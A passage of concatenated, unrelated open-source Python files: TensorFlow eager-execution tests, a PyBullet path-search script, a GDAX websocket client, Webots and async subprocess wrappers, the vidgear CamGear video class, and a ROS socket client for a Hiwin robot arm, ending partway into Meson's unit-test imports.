with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
def testOperationWithNoInputsRunsOnDevice(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEquals(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
def testLocalCrossDevice(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = constant_op.constant(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
if __name__ == '__main__':
test.main()
|
multi_scene.py
|
from ana import ANASearch
from astar import AstarSearch
import numpy as np
from playground_generator import PybulletPlayground
import random
import multiprocessing as mp
def search(i):
path_len = 0
while True:
seed = random.randint(1,100000)
random.seed(seed)
print('[Start: Seed={}]'.format(seed))
# generate random scene
# x_max, y_max, x_step, y_step, x_noise, y_noise = (8, 4, 1.5, 1.5, 1, 1)
x_max, y_max, x_step, y_step, x_noise, y_noise = (6, 4, 1.5, 2, 1, 0.5)
floor_size = (x_max*2, y_max*2)
obstacle_config = [
(
i+(random.random()-0.5)*2*x_noise,
j+(random.random()-0.5)*2*y_noise,
random.random()*np.pi
)
for i in np.arange(-x_max+x_step, x_max, x_step)
for j in np.arange(-y_max+y_step, y_max, y_step)
]
margin = 3
# obstacle_config = [c for c in obstacle_config if not (c[0]<-x_max+margin and c[1]<-y_max+margin)]
# obstacle_config = [c for c in obstacle_config if not (c[0]>x_max-margin and c[1]>y_max-margin)]
obstacle_config = [c for c in obstacle_config if not (np.linalg.norm([c[0]+x_max,c[1]])<margin or np.linalg.norm([c[0]-x_max,c[1]])<margin)]
playground = PybulletPlayground('pr2playground_template.json')
playground_filename = 'dist/pr2playground {}.json'.format(seed)
playground.generate(playground_filename, floor_size, obstacle_config)
# set searching arguments
args = {
'n_connected': 4,
'grid_size': [0.1, 0.1, np.pi/2],
'start_config': (-x_max+0.5, 0, np.pi/2),
'goal_config': (x_max-1, 0, -np.pi/2),
'timeout': 300,
'camera_distance': 10,
'angle_disabled': True,
'verbose': False
}
# conduct search
ana = ANASearch(**args)
astar = AstarSearch(**args)
history_ana = ana.search(use_gui=False, map=playground_filename)
path_len = len(history_ana)
if path_len>2:
print('[Found: Seed={}, path={}]'.format(seed, path_len))
return
elif path_len>0:
print('[Stop: Seed={}, path={}]'.format(seed, path_len))
if __name__ == '__main__':
process_list = []
for i in range(mp.cpu_count()-2):
p = mp.Process(target=search, args=(i,))
process_list.append(p)
p.start()
for p in process_list:
p.join()
|
gdax.py
|
# Import Built-Ins
import logging
import json
import threading
import time
# Import Third-Party
from websocket import create_connection, WebSocketTimeoutException
import requests
# Import Homebrew
from .base import WSSAPI
# Init Logging Facilities
log = logging.getLogger(__name__)
class GDAXWSS(WSSAPI):
def __init__(self):
super(GDAXWSS, self).__init__('wss://ws-feed.gdax.com', 'GDAX')
self.conn = None
r = requests.get('https://api.gdax.com/products').json()
self.pairs = [x['id'] for x in r]
self._data_thread = None
def start(self):
super(GDAXWSS, self).start()
self._data_thread = threading.Thread(target=self._process_data)
self._data_thread.daemon = True
self._data_thread.start()
def stop(self):
super(GDAXWSS, self).stop()
self._data_thread.join()
def _process_data(self):
self.conn = create_connection(self.addr, timeout=4)
payload = json.dumps({'type': 'subscribe', 'product_ids': self.pairs})
self.conn.send(payload)
while self.running:
try:
data = json.loads(self.conn.recv())
except (WebSocketTimeoutException, ConnectionResetError):
self._controller_q.put('restart')
if 'product_id' in data:
self.data_q.put(('order_book', data['product_id'],
data, time.time()))
self.conn = None
|
command.py
|
# Copyright 1996-2020 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Launch a system command."""
import os
import subprocess
import sys
import threading
class Command(object):
"""Launch a system command."""
def __init__(self, cmd, ansiEscape=False):
"""Constructor."""
self.ansiEscape = ansiEscape
self.cmd = cmd.split()
self.resetAttributes()
self.mainProcessMutex = threading.Lock()
def resetAttributes(self):
"""Reset the internal attributes."""
self.expectedStringFound = False
self.isTimeout = False
self.mainProcess = None
self.mainThread = None
self.returncode = 0
self.output = ''
def terminate(self, force):
"""Terminate the command."""
self.isRunningFlag = False
if self.mainProcess:
self.mainProcess.terminate()
if force and sys.platform == 'darwin' and self.mainProcess:
self.mainProcess.kill()
def isRunning(self):
"""Detect if the command is running."""
return self.mainProcess is not None
def stopMainProcess(self):
"""Stop the main process."""
if self.mainProcess:
self.mainProcess.terminate()
if self.mainThread:
self.mainThread.join()
self.mainProcess = None
self.mainThread = None
def run(self, timeout=None, expectedString=None, silent=True,
forceTermination=True, shell=False, redirectionFile=None):
"""Run the command and monitor STDERR and STDOUT pipe."""
def mainTarget():
if self.redirectionFile is None:
self.mainProcess = subprocess.Popen(
self.cmd, shell=self.shell, bufsize=1, universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
else:
outFile = open(self.redirectionFile, "w")
self.mainProcess = subprocess.Popen(
self.cmd, shell=self.shell, bufsize=1, universal_newlines=True,
stdout=outFile, stderr=outFile)
while self.mainProcess.poll() is None:
self.mainProcess.wait()
self.returncode = self.mainProcess.returncode
with self.mainProcessMutex:
self.mainProcess = None
if self.redirectionFile is not None:
outFile.close()
def outputWriterTarget():
while self.isRunningFlag:
line = ''
with self.mainProcessMutex:
if self.mainProcess:
line = self.mainProcess.stdout.readline() # blocking
if line:
self.output += line
if not self.silent:
if self.ansiEscape:
if line.startswith("OK: "):
line = '\033[92m' + line # green
elif line.startswith("FAILURE"):
line = '\033[91m' + line # red
else:
line = '\033[0m' + line
print(line[:-1])
if sys.platform == 'win32':
sys.stdout.flush()
def outputListenerTarget():
size = 0
while self.isRunningFlag:
if size != len(self.output):
if self.expectedString in self.output:
self.expectedStringFound = True
self.terminate(force=True)
return
size = len(self.output)
self.resetAttributes()
self.expectedString = expectedString
self.silent = silent
self.timeout = timeout
self.shell = shell
self.redirectionFile = redirectionFile
self.isRunningFlag = True
try:
self.outputWriterThread = threading.Thread(
target=outputWriterTarget)
self.outputWriterThread.start()
if expectedString:
self.outputListenerThread = threading.Thread(
target=outputListenerTarget)
self.outputListenerThread.start()
self.mainThread = threading.Thread(target=mainTarget)
self.mainThread.start()
self.mainThread.join(timeout)
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive(): # timeout case
self.isTimeout = True
if forceTermination:
self.stopMainProcess()
except (KeyboardInterrupt, SystemExit):
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive():
self.terminate(force=False)
exit()
def runTest(self, timeout=None, silent=True, forceTermination=True,
shell=False):
"""Run the command and redirect the STDERR and STDOUT to files."""
def mainTarget():
outFile = open(self.outFileName, "w")
errFile = open(self.errFileName, "w")
self.returncode = subprocess.call(self.cmd, shell=shell, bufsize=1,
universal_newlines=True, stdout=outFile, stderr=errFile)
outFile.close()
errFile.close()
self.outFileName = os.environ['WEBOTS_HOME'] + os.sep + 'tests' + os.sep + 'webots_stdout.txt'
self.errFileName = os.environ['WEBOTS_HOME'] + os.sep + 'tests' + os.sep + 'webots_stderr.txt'
self.resetAttributes()
self.silent = silent
self.timeout = timeout
self.isRunningFlag = True
try:
self.mainThread = threading.Thread(target=mainTarget)
self.mainThread.start()
self.mainThread.join(timeout)
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive(): # timeout case
self.isTimeout = True
if forceTermination:
self.stopMainProcess()
except (KeyboardInterrupt, SystemExit):
self.isRunningFlag = False
if self.mainProcess and self.mainThread.is_alive():
self.terminate(force=False)
exit()
|
camgear.py
|
"""
===============================================
vidgear library source-code is deployed under the Apache 2.0 License:
Copyright (c) 2019-2020 Abhishek Thakur(@abhiTronix) <[email protected]>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================
"""
# import the necessary packages
import cv2
import time
import logging as log
from threading import Thread
from pkg_resources import parse_version
from .helper import capPropId, logger_handler, check_CV_version, youtube_url_validator
# define logger
logger = log.getLogger("CamGear")
logger.propagate = False
logger.addHandler(logger_handler())
logger.setLevel(log.DEBUG)
class CamGear:
"""
CamGear API supports a diverse range of video streams which can handle/control video stream almost any IP/USB Cameras, multimedia video file format
(_upto 4k tested_), any network stream URL such as *http(s), rtp, rstp, rtmp, mms, etc.* In addition to this, it also supports live Gstreamer's RAW pipelines
and YouTube video/livestreams URLs.
CamGear API provides a flexible, high-level multi-threaded wrapper around [**OpenCV's VideoCapture Class**](https://docs.opencv.org/3.4/d8/dfe/classcv_1_1VideoCapture.html) with direct access to almost all of its available parameters,
and also internally employs `pafy` with `youtube-dl` backend for enabling seamless live *YouTube streaming*.
CamGear relies exclusively on **Threaded Queue mode** for threaded, error-free and synchronized frame handling.
"""
def __init__(
self,
source=0,
y_tube=False,
backend=0,
colorspace=None,
logging=False,
time_delay=0,
**options
):
# enable logging if specified
self.__logging = False
if logging:
self.__logging = logging
# check if Youtube Mode is ON (True)
if y_tube:
try:
# import pafy and parse youtube stream url
import pafy
# validate
video_url = youtube_url_validator(source)
if video_url:
source_object = pafy.new(video_url)
vo_source = source_object.getbestvideo("webm", ftypestrict=True)
va_source = source_object.getbest("webm", ftypestrict=False)
# select the best quality
if vo_source is None or (
va_source.dimensions >= vo_source.dimensions
):
source = va_source.url
else:
source = vo_source.url
if self.__logging:
logger.debug(
"YouTube source ID: `{}`, Title: `{}`".format(
video_url, source_object.title
)
)
else:
raise RuntimeError(
"Invalid `{}` Youtube URL cannot be processed!".format(source)
)
except Exception as e:
if self.__logging:
logger.exception(str(e))
raise ValueError(
"[CamGear:ERROR] :: YouTube Mode is enabled and the input YouTube URL is incorrect!"
)
# youtube mode variable initialization
self.__youtube_mode = y_tube
# assigns special parameter to global variable and clear
self.__threaded_queue_mode = options.pop("THREADED_QUEUE_MODE", True)
if not isinstance(self.__threaded_queue_mode, bool):
# reset improper values
self.__threaded_queue_mode = True
self.__queue = None
# initialize deque for video files only
if self.__threaded_queue_mode and isinstance(source, str):
# import deque
from collections import deque
# define deque and assign it to global var
self.__queue = deque(maxlen=96) # max len 96 to check overflow
# log it
if self.__logging:
logger.debug(
"Enabling Threaded Queue Mode for the current video source!"
)
else:
# otherwise disable it
self.__threaded_queue_mode = False
# log it
if self.__logging:
logger.warning(
"Threaded Queue Mode is disabled for the current video source!"
)
# stream variable initialization
self.stream = None
if backend and isinstance(backend, int):
# add backend if specified and initialize the camera stream
if check_CV_version() == 3:
# Different OpenCV 3.4.x statement
self.stream = cv2.VideoCapture(source + backend)
else:
# Two parameters are available since OpenCV 4+ (master branch)
self.stream = cv2.VideoCapture(source, backend)
logger.debug("Setting backend `{}` for this source.".format(backend))
else:
# initialize the camera stream
self.stream = cv2.VideoCapture(source)
# initializing colorspace variable
self.color_space = None
# apply attributes to source if specified
options = {str(k).strip(): v for k, v in options.items()}
for key, value in options.items():
property = capPropId(key)
if not (property is None):
self.stream.set(property, value)
# handle colorspace value
if not (colorspace is None):
self.color_space = capPropId(colorspace.strip())
if self.__logging and not (self.color_space is None):
logger.debug(
"Enabling `{}` colorspace for this video stream!".format(
colorspace.strip()
)
)
# initialize and assign frame-rate variable
self.framerate = 0.0
_fps = self.stream.get(cv2.CAP_PROP_FPS)
if _fps > 1.0:
self.framerate = _fps
# applying time delay to warm-up webcam only if specified
if time_delay:
time.sleep(time_delay)
# frame variable initialization
(grabbed, self.frame) = self.stream.read()
# check if valid stream
if grabbed:
# render colorspace if defined
if not (self.color_space is None):
self.frame = cv2.cvtColor(self.frame, self.color_space)
if self.__threaded_queue_mode:
# initialize and append to queue
self.__queue.append(self.frame)
else:
raise RuntimeError(
"[CamGear:ERROR] :: Source is invalid, CamGear failed to intitialize stream on this source!"
)
# thread initialization
self.__thread = None
# initialize termination flag
self.__terminate = False
def start(self):
"""
Launches the internal *Threaded Frames Extractor* daemon
**Returns:** A reference to the CamGear class object.
"""
self.__thread = Thread(target=self.__update, name="CamGear", args=())
self.__thread.daemon = True
self.__thread.start()
return self
def __update(self):
"""
A **Threaded Frames Extractor**, that keep iterating frames from OpenCV's VideoCapture API to a internal monitored deque,
until the thread is terminated, or frames runs out.
"""
# keep iterating infinitely until the thread is terminated or frames runs out
while True:
# if the thread indicator variable is set, stop the thread
if self.__terminate:
break
if self.__threaded_queue_mode:
# check queue buffer for overflow
if len(self.__queue) >= 96:
# stop iterating if overflowing occurs
time.sleep(0.000001)
continue
# otherwise, read the next frame from the stream
(grabbed, frame) = self.stream.read()
# check for valid frames
if not grabbed:
# no frames received, then safely exit
if self.__threaded_queue_mode:
if len(self.__queue) == 0:
break
else:
continue
else:
break
if not (self.color_space is None):
# apply colorspace to frames
color_frame = None
try:
if isinstance(self.color_space, int):
color_frame = cv2.cvtColor(frame, self.color_space)
else:
if self.__logging:
logger.warning(
"Global color_space parameter value `{}` is not a valid!".format(
self.color_space
)
)
self.color_space = None
except Exception as e:
# Catch if any error occurred
self.color_space = None
if self.__logging:
logger.exception(str(e))
logger.warning("Input colorspace is not a valid colorspace!")
if not (color_frame is None):
self.frame = color_frame
else:
self.frame = frame
else:
self.frame = frame
# append to queue
if self.__threaded_queue_mode:
self.__queue.append(self.frame)
self.__threaded_queue_mode = False
self.frame = None
# release resources
self.stream.release()
def read(self):
"""
Extracts frames synchronously from monitored deque, while maintaining a fixed-length frame buffer in the memory,
and blocks the thread if the deque is full.
**Returns:** A n-dimensional numpy array.
"""
while self.__threaded_queue_mode:
if len(self.__queue) > 0:
return self.__queue.popleft()
return self.frame
def stop(self):
"""
Safely terminates the thread, and release the VideoStream resources.
"""
if self.__logging:
logger.debug("Terminating processes.")
# terminate Threaded queue mode separately
if self.__threaded_queue_mode and not (self.__queue is None):
if len(self.__queue) > 0:
self.__queue.clear()
self.__threaded_queue_mode = False
self.frame = None
# indicate that the thread should be terminate
self.__terminate = True
# wait until stream resources are released (producer thread might be still grabbing frame)
if self.__thread is not None:
self.__thread.join()
# properly handle thread exit
if self.__youtube_mode:
# kill thread-lock in youtube mode
self.__thread = None
|
async_command.py
|
import os
import sys
import time
from subprocess import PIPE, Popen
from threading import Thread
from queue import Queue, Empty
ON_POSIX = 'posix' in sys.builtin_module_names
[PENDING, RUNNING, STOPPED] = range(3) # Command state enum
class AsyncCommand:
# Assign a command that will be run in a separate thread
def __init__(self, command, executeNow=True):
self.command = command.split()
self.state = STOPPED
self.result = ""
self.proc = None
self.queue = None
self.cmdThread = None
# Open the null device for dumping unwanted output into.
self.devnull = open(os.devnull, 'w')
if executeNow:
self.run()
# Start the command running in a thread
def run(self):
if self.state == STOPPED:
self.state = PENDING
self.result = "" # Reset
self.proc = Popen(self.command, stdout=PIPE, stderr=self.devnull, close_fds=ON_POSIX)
self.queue = Queue()
self.cmdThread = Thread(target=self._enqueueOutput, args=(self.proc.stdout, self.queue))
self.cmdThread.daemon = True # thread dies with the program
self.cmdThread.start()
# TODO: Why is the loop here? This makes the asyncCommand a blocking command...
while self.state != STOPPED:
try:
line = self.queue.get_nowait()
except Empty:
if self.state == RUNNING:
self.state = STOPPED
else:
time.sleep(0.1)
else: # got line
if self.state == PENDING:
self.state = RUNNING
self.result += line.decode('utf-8')
#
def _runThread(self):
pass
# Worker thread function for fetching lines of command output
def _enqueueOutput(self, out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def isStopped(self):
return self.state == STOPPED
def getResult(self):
return self.result
|
Hiwin_RT605_ArmCommand_Socket_20190627174537.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = '%s'%x
pos.y = '%s'%y
pos.z = '%s'%z
pos.pitch = '%s'%pitch
pos.roll = '%s'%roll
pos.yaw = '%s'%yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%action)
socket_cmd.grip = int('%s'%grip)
socket_cmd.ra = int('%s'%ra)
socket_cmd.setvel = int('%s'%setvel)
socket_cmd.setboth = int('%s'%setboth)
arm_mode_flag = True
print("sssss:",socket_cmd.action)
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
#print ("Ready to connect")
#rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global Socket,arm_mode_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
#print(data)
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
# Arm_feedback = 0
# socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
# Arm_feedback = 1
# socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
# Arm_feedback = 6
# socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
# Socket_sent_flag = False
# socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from mesonbuild._pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import typing as T
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath, is_linux, git, GIT
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from mesonbuild.wrap.wrap import PackageDefinition, WrapException
from run_tests import (
